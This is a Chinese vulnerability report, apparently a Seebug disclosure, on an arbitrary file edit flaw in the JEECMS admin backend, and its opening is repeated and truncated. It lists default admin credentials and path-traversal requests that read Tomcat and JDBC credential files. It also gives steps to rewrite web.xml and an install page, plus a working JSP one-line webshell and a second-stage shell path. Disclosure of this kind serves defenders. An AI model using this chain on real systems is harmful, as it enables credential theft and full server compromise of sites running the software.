### 简要描述: JEECMS后台任意文件编辑漏洞以及官方的demo站、官方服务器安全问题 ### 详细说明: 2.x后台: login/Jeecms.do 3.x后台: jeeadmin/jeecms/index.do 默认账户:admin 默认密码:password 获取tomcat密码: /jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml 获取JDBC数据库账号密码: /jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties JEECMS2.x版读取路径: admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties 修改web.xml取消对jsp的过滤: /jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml JEECMS2.x版读取路径: admin/core/template/Com_edit.do?relPath=\../../../web.xml 修改install/install_setup.jsp: /jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp JEECMS2.x版读取路径: admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp 插入Jsp一句话: <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter...
### 简要描述: JEECMS后台任意文件编辑漏洞以及官方的demo站、官方服务器安全问题 ### 详细说明: 2.x后台: login/Jeecms.do 3.x后台: jeeadmin/jeecms/index.do 默认账户:admin 默认密码:password 获取tomcat密码: /jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml 获取JDBC数据库账号密码: /jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties JEECMS2.x版读取路径: admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties 修改web.xml取消对jsp的过滤: /jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml JEECMS2.x版读取路径: admin/core/template/Com_edit.do?relPath=\../../../web.xml 修改install/install_setup.jsp: /jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp JEECMS2.x版读取路径: admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp 插入Jsp一句话: <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter ("f"))).write(request.getParameter("t").getBytes()); %> 修改后的一句话目录 /install/install_setup.jsp 一句话连接成功后的jsp大马目录: /ma.jsp ### 漏洞证明: [<img src="https://images.seebug.org/upload/201201/27040629b67a172b49a9dcbe26f528dd769b487e.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201201/27040629b67a172b49a9dcbe26f528dd769b487e.jpg) [<img src="https://images.seebug.org/upload/201201/270405443c8f22df964678b652fbbcdcdcc02240.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201201/270405443c8f22df964678b652fbbcdcdcc02240.jpg) [<img src="https://images.seebug.org/upload/201201/27040606cf3c2320fe6f08c253d6d9763f25e66f.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201201/27040606cf3c2320fe6f08c253d6d9763f25e66f.jpg)